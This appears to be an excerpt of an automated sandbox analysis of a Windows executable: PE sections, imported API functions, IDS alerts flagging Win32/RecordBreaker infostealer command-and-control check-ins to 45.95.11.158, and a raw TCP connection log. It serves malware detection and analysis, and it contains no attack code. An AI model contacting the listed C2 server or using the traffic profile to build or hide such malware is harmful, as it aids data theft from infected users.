                                                                                                                                                                      .rdata0x2e0000x180x200False0.05078125data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .reloc0x2f0000x18840x1a00False0.7889122596153846data6.586647864611828IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .rsrc0x310000x1cdc0x1e00False0.3592447916666667data4.75165483227057IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                                                                                      RT_ICON0x312700x128GLS_BINARY_LSB_FIRST
                                                                                                                                                                      RT_ICON0x313980x568GLS_BINARY_LSB_FIRST
                                                                                                                                                                      RT_ICON0x319000x2e8data
                                                                                                                                                                      RT_ICON0x31be80x8a8data
                                                                                                                                                                      RT_RCDATA0x324900x10data
                                                                                                                                                                      RT_RCDATA0x324a00x110data
                                                                                                                                                                      RT_GROUP_ICON0x325b00x3edata
                                                                                                                                                                      RT_VERSION0x325f00x374dataRussianRussia
                                                                                                                                                                      RT_MANIFEST0x329640x376XML 1.0 document, ASCII text, with CRLF line terminatorsRussianRussia
                                                                                                                                                                      DLLImport
                                                                                                                                                                      kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, WideCharToMultiByte, GetThreadLocale, GetStartupInfoA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                                                                                                      user32.dllGetKeyboardType, MessageBoxA
                                                                                                                                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                                                                      oleaut32.dllSysFreeString, SysReAllocStringLen
                                                                                                                                                                      kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                                                                      advapi32.dllRegCloseKey, OpenThreadToken, OpenProcessToken, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid, AdjustTokenPrivileges
                                                                                                                                                                      kernel32.dllWriteFile, WinExec, WaitForSingleObject, TerminateProcess, SystemTimeToFileTime, Sleep, SetFileTime, SetFilePointer, SetErrorMode, SetEndOfFile, ReadFile, OpenProcess, MultiByteToWideChar, LocalFileTimeToFileTime, LoadLibraryA, GlobalFree, GlobalAlloc, GetVersion, GetUserDefaultLangID, GetProcAddress, GetModuleHandleA, GetLocalTime, GetLastError, GetFileTime, GetFileSize, GetExitCodeProcess, GetCurrentThread, GetCurrentProcess, FreeLibrary, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, DosDateTimeToFileTime, CompareFileTime, CloseHandle
                                                                                                                                                                      gdi32.dllStretchDIBits, StretchBlt, SetWindowOrgEx, SetTextColor, SetStretchBltMode, SetRectRgn, SetROP2, SetPixel, SetDIBits, SetBrushOrgEx, SetBkMode, SetBkColor, SelectObject, SaveDC, RestoreDC, OffsetRgn, MoveToEx, IntersectClipRect, GetStockObject, GetPixel, GetDIBits, ExtSelectClipRgn, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CombineRgn, BitBlt
                                                                                                                                                                      user32.dllWaitMessage, ValidateRect, TranslateMessage, ShowWindow, SetWindowPos, SetTimer, SetParent, SetForegroundWindow, SetFocus, SetCursor, SendMessageA, ScreenToClient, ReleaseDC, PostQuitMessage, OffsetRect, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsIconic, InvalidateRect, GetWindowRgn, GetWindowRect, GetWindowDC, GetUpdateRgn, GetSystemMetrics, GetSystemMenu, GetSysColor, GetParent, GetWindow, GetKeyState, GetFocus, GetDCEx, GetDC, GetCursorPos, GetClientRect, GetCapture, FillRect, ExitWindowsEx, EnumWindows, EndPaint, EnableWindow, EnableMenuItem, DrawIcon, DestroyWindow, DestroyIcon, DeleteMenu, CopyImage, ClientToScreen, BeginPaint, CharLowerBuffA
                                                                                                                                                                      winmm.dlltimeKillEvent, timeSetEvent
                                                                                                                                                                      oleaut32.dllSysAllocStringLen
                                                                                                                                                                      ole32.dllOleInitialize
                                                                                                                                                                      comctl32.dllImageList_Draw, ImageList_SetBkColor, ImageList_Create, InitCommonControls
                                                                                                                                                                      shell32.dllSHGetFileInfoA
                                                                                                                                                                      user32.dllwvsprintfA, SetWindowLongA, SetPropA, SendMessageA, RemovePropA, RegisterClassA, PostMessageA, PeekMessageA, MessageBoxA, LoadIconA, LoadCursorA, GetWindowTextLengthA, GetWindowTextA, GetWindowLongA, GetPropA, GetClassLongA, GetClassInfoA, FindWindowA, DrawTextA, DispatchMessageA, DefWindowProcA, CreateWindowExA, CallWindowProcA
                                                                                                                                                                      gdi32.dllGetTextExtentPoint32A, GetObjectA, CreateFontIndirectA, AddFontResourceA
                                                                                                                                                                      kernel32.dllWritePrivateProfileStringA, SetFileAttributesA, SetCurrentDirectoryA, RemoveDirectoryA, LoadLibraryA, GetWindowsDirectoryA, GetVersionExA, GetTimeFormatA, GetTempPathA, GetSystemDirectoryA, GetShortPathNameA, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetFullPathNameA, GetFileAttributesA, GetDiskFreeSpaceA, GetDateFormatA, GetComputerNameA, GetCommandLineA, FindNextFileA, FindFirstFileA, ExpandEnvironmentStringsA, DeleteFileA, CreateFileA, CreateDirectoryA, CompareStringA
                                                                                                                                                                      advapi32.dllRegSetValueExA, RegQueryValueExA, RegQueryInfoKeyA, RegOpenKeyExA, RegEnumKeyExA, RegCreateKeyExA, LookupPrivilegeValueA, GetUserNameA
                                                                                                                                                                      shell32.dllShellExecuteExA, ShellExecuteA
                                                                                                                                                                      cabinet.dllFDIDestroy, FDICopy, FDICreate
                                                                                                                                                                      ole32.dllOleInitialize, CoTaskMemFree, CoCreateInstance, CoUninitialize, CoInitialize
                                                                                                                                                                      shell32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHChangeNotify, SHBrowseForFolderA
                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                      RussianRussia
                                                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                      192.168.2.645.95.11.15849800802038485 08/23/22-18:26:09.300558TCP2038485ET TROJAN Win32/RecordBreaker - Observed UA M14980080192.168.2.645.95.11.158
                                                                                                                                                                      192.168.2.645.95.11.15849800802038486 08/23/22-18:26:30.932075TCP2038486ET TROJAN Win32/RecordBreaker - Observed UA M24980080192.168.2.645.95.11.158
                                                                                                                                                                      192.168.2.645.95.11.15849800802038487 08/23/22-18:26:30.932075TCP2038487ET TROJAN Win32/RecordBreaker - Library Request4980080192.168.2.645.95.11.158
                                                                                                                                                                      192.168.2.645.95.11.15849800802036934 08/23/22-18:26:09.300558TCP2036934ET TROJAN Win32/RecordBreaker CnC Checkin M14980080192.168.2.645.95.11.158
                                                                                                                                                                      45.95.11.158192.168.2.680498002036955 08/23/22-18:26:09.606665TCP2036955ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response804980045.95.11.158192.168.2.6
                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Aug 23, 2022 18:26:02.464993954 CEST49765443192.168.2.6216.58.209.46
                                                                                                                                                                      Aug 23, 2022 18:26:02.465027094 CEST44349765216.58.209.46192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.465095997 CEST49765443192.168.2.6216.58.209.46
                                                                                                                                                                      Aug 23, 2022 18:26:02.465526104 CEST49766443192.168.2.6142.250.180.141
                                                                                                                                                                      Aug 23, 2022 18:26:02.465553999 CEST44349766142.250.180.141192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.465632915 CEST49766443192.168.2.6142.250.180.141
                                                                                                                                                                      Aug 23, 2022 18:26:02.466866016 CEST49768443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:02.466901064 CEST44349768148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.466959000 CEST49768443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:02.470848083 CEST49765443192.168.2.6216.58.209.46
                                                                                                                                                                      Aug 23, 2022 18:26:02.470879078 CEST44349765216.58.209.46192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.481693029 CEST49770443192.168.2.6142.250.180.141
                                                                                                                                                                      Aug 23, 2022 18:26:02.481736898 CEST44349770142.250.180.141192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.481826067 CEST49770443192.168.2.6142.250.180.141
                                                                                                                                                                      Aug 23, 2022 18:26:02.482520103 CEST49766443192.168.2.6142.250.180.141
                                                                                                                                                                      Aug 23, 2022 18:26:02.482553959 CEST44349766142.250.180.141192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.488910913 CEST49768443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:02.488943100 CEST44349768148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.494501114 CEST49770443192.168.2.6142.250.180.141
                                                                                                                                                                      Aug 23, 2022 18:26:02.494534016 CEST44349770142.250.180.141192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.545571089 CEST44349765216.58.209.46192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.548562050 CEST44349766142.250.180.141192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.555291891 CEST44349770142.250.180.141192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.572666883 CEST44349768148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.637445927 CEST49768443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:02.665474892 CEST49770443192.168.2.6142.250.180.141
                                                                                                                                                                      Aug 23, 2022 18:26:02.665509939 CEST49765443192.168.2.6216.58.209.46
                                                                                                                                                                      Aug 23, 2022 18:26:02.665508986 CEST49766443192.168.2.6142.250.180.141
                                                                                                                                                                      Aug 23, 2022 18:26:02.701700926 CEST49765443192.168.2.6216.58.209.46
                                                                                                                                                                      Aug 23, 2022 18:26:02.701718092 CEST44349765216.58.209.46192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.703986883 CEST44349765216.58.209.46192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.704025030 CEST44349765216.58.209.46192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.704319954 CEST49765443192.168.2.6216.58.209.46
                                                                                                                                                                      Aug 23, 2022 18:26:02.706279039 CEST44349765216.58.209.46192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.706367016 CEST49765443192.168.2.6216.58.209.46
                                                                                                                                                                      Aug 23, 2022 18:26:02.712027073 CEST49766443192.168.2.6142.250.180.141
                                                                                                                                                                      Aug 23, 2022 18:26:02.712049961 CEST44349766142.250.180.141192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.712667942 CEST49770443192.168.2.6142.250.180.141
                                                                                                                                                                      Aug 23, 2022 18:26:02.712691069 CEST44349770142.250.180.141192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.715298891 CEST44349770142.250.180.141192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.715399981 CEST49770443192.168.2.6142.250.180.141
                                                                                                                                                                      Aug 23, 2022 18:26:02.715414047 CEST44349770142.250.180.141192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.715965033 CEST44349766142.250.180.141192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.716033936 CEST44349766142.250.180.141192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.716065884 CEST49766443192.168.2.6142.250.180.141
                                                                                                                                                                      Aug 23, 2022 18:26:02.718157053 CEST49768443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:02.718199015 CEST44349768148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.720441103 CEST44349768148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.720465899 CEST44349768148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.720571041 CEST49768443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:02.765465021 CEST49766443192.168.2.6142.250.180.141
                                                                                                                                                                      Aug 23, 2022 18:26:02.765470982 CEST49770443192.168.2.6142.250.180.141
                                                                                                                                                                      Aug 23, 2022 18:26:02.872339964 CEST49772443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:02.872394085 CEST44349772148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.872534037 CEST49772443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:02.873054981 CEST49773443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:02.873094082 CEST443497738.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.873178005 CEST49773443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:02.873341084 CEST49774443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:02.873370886 CEST443497748.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.873456955 CEST49774443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:02.873738050 CEST49775443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:02.873778105 CEST443497758.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.873840094 CEST49775443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:02.873987913 CEST49772443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:02.874022961 CEST49771443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:02.874039888 CEST44349772148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.874047041 CEST44349771148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.874119043 CEST49771443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:02.874304056 CEST49773443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:02.874321938 CEST443497738.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.878567934 CEST49774443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:02.878607988 CEST443497748.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.878896952 CEST49775443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:02.878936052 CEST443497758.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.879112959 CEST49771443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:02.879148006 CEST44349771148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.924117088 CEST443497738.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.924565077 CEST443497758.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.925721884 CEST443497748.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.954283953 CEST44349772148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.959325075 CEST44349771148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:02.965436935 CEST49773443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:02.965507030 CEST49775443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.065531969 CEST49772443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:03.065541983 CEST49771443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:03.131437063 CEST443497748.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.131588936 CEST49774443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.166747093 CEST49774443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.166769028 CEST443497748.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.167017937 CEST49775443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.167046070 CEST443497758.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.167159081 CEST49773443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.167181969 CEST443497738.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.167350054 CEST49772443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:03.167363882 CEST44349772148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.168018103 CEST443497748.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.168118954 CEST49774443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.168447018 CEST49771443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:03.168495893 CEST44349771148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.169131994 CEST443497758.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.169151068 CEST443497758.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.169222116 CEST49775443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.170212984 CEST44349772148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.170249939 CEST44349772148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.170348883 CEST49772443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:03.171070099 CEST443497738.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.171092987 CEST443497738.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.171156883 CEST44349771148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.171164989 CEST49773443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.171194077 CEST44349771148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.171253920 CEST49771443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:03.251250029 CEST49768443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:03.251544952 CEST49771443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:03.251585960 CEST44349768148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.251848936 CEST44349771148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.252398014 CEST49772443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:03.252634048 CEST44349772148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.255273104 CEST49765443192.168.2.6216.58.209.46
                                                                                                                                                                      Aug 23, 2022 18:26:03.255633116 CEST44349765216.58.209.46192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.259999990 CEST49766443192.168.2.6142.250.180.141
                                                                                                                                                                      Aug 23, 2022 18:26:03.260277987 CEST49770443192.168.2.6142.250.180.141
                                                                                                                                                                      Aug 23, 2022 18:26:03.260349989 CEST44349766142.250.180.141192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.260555983 CEST44349770142.250.180.141192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.262993097 CEST49768443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:03.263046980 CEST44349768148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.263324022 CEST49771443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:03.263391018 CEST44349771148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.263578892 CEST49772443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:03.263617992 CEST44349772148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.264139891 CEST49766443192.168.2.6142.250.180.141
                                                                                                                                                                      Aug 23, 2022 18:26:03.264179945 CEST44349766142.250.180.141192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.265274048 CEST49765443192.168.2.6216.58.209.46
                                                                                                                                                                      Aug 23, 2022 18:26:03.265304089 CEST44349765216.58.209.46192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.265490055 CEST49773443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.279167891 CEST49774443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.279578924 CEST443497748.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.281254053 CEST49775443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.281374931 CEST49774443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.281589985 CEST49773443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.281644106 CEST443497748.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.281721115 CEST443497758.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.281776905 CEST49775443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.281790018 CEST443497738.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.282202005 CEST49773443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.282221079 CEST443497738.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.287760973 CEST44349771148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.287870884 CEST49771443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:03.288024902 CEST44349772148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.288121939 CEST49772443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:03.288223028 CEST44349768148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.288304090 CEST49768443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:03.300520897 CEST443497748.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.300628901 CEST49774443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.300789118 CEST443497738.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.300877094 CEST49773443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.306376934 CEST44349765216.58.209.46192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.306478977 CEST49765443192.168.2.6216.58.209.46
                                                                                                                                                                      Aug 23, 2022 18:26:03.306489944 CEST44349765216.58.209.46192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.306562901 CEST44349765216.58.209.46192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.306960106 CEST49765443192.168.2.6216.58.209.46
                                                                                                                                                                      Aug 23, 2022 18:26:03.309099913 CEST443497758.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.309185028 CEST49775443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.328520060 CEST44349766142.250.180.141192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.328623056 CEST49766443192.168.2.6142.250.180.141
                                                                                                                                                                      Aug 23, 2022 18:26:03.328639984 CEST44349766142.250.180.141192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.328711987 CEST49766443192.168.2.6142.250.180.141
                                                                                                                                                                      Aug 23, 2022 18:26:03.365483046 CEST49770443192.168.2.6142.250.180.141
                                                                                                                                                                      Aug 23, 2022 18:26:03.365505934 CEST44349770142.250.180.141192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.465493917 CEST49770443192.168.2.6142.250.180.141
                                                                                                                                                                      Aug 23, 2022 18:26:03.561753035 CEST49774443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.561783075 CEST443497748.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.563422918 CEST49773443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.563446999 CEST443497738.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.573580980 CEST49775443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.573627949 CEST443497758.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.686275959 CEST49771443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:03.686326981 CEST44349771148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.687077045 CEST49772443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:03.687112093 CEST44349772148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.688149929 CEST49768443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:03.688173056 CEST44349768148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.749306917 CEST49765443192.168.2.6216.58.209.46
                                                                                                                                                                      Aug 23, 2022 18:26:03.749351978 CEST44349765216.58.209.46192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.750060081 CEST49766443192.168.2.6142.250.180.141
                                                                                                                                                                      Aug 23, 2022 18:26:03.750088930 CEST44349766142.250.180.141192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.905038118 CEST49777443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.905095100 CEST443497778.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.905179024 CEST49777443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.905354977 CEST49778443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.905396938 CEST443497788.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.905450106 CEST49778443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.905999899 CEST49777443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.906028032 CEST443497778.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.906239986 CEST49778443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:03.906256914 CEST443497788.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.955118895 CEST443497778.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:03.961138010 CEST443497788.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:04.029953957 CEST49778443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:04.029956102 CEST49777443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:04.029988050 CEST443497788.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:04.030009031 CEST443497778.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:04.035300970 CEST443497788.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:04.035322905 CEST443497778.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:04.035339117 CEST443497788.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:04.035378933 CEST443497778.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:04.035401106 CEST49778443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:04.035509109 CEST49777443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:04.066003084 CEST49779443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:04.066060066 CEST44349779148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:04.066235065 CEST49779443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:04.066970110 CEST49779443192.168.2.6148.251.234.83
                                                                                                                                                                      Aug 23, 2022 18:26:04.066991091 CEST44349779148.251.234.83192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:04.114778996 CEST49777443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:04.115128994 CEST443497778.8.4.4192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:04.115154982 CEST49778443192.168.2.68.8.4.4
                                                                                                                                                                      Aug 23, 2022 18:26:04.115195036 CEST49777443192.168.2.68.8.4.4
